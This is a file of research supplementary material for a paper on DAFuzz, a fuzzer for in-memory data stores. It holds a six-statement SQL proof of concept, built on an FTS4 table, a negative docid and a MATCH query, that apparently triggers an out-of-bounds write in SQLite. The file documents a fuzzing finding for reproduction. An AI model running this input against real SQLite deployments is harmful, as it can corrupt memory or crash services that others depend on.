# Supplementary material for: DAFuzz: data-aware fuzzing of in-memory data stores
Source: PeerJ Comput Sci. 2023 Sep 19;9:e1592. doi: 10.7717/peerj-cs.1592 (PMC10557509; doi:10.7717/peerj-cs.1592)
Supplement: Supplemental Information 2 [file peerj-cs-09-1592-s002.zip › DAFuzz/docs/vuln_samples/sqlite-oob-write.sql]

CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
INSERT INTO t0 VALUES('');
INSERT INTO t0 VALUES('');
INSeRT INTO t0 VALUES('o');
SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';
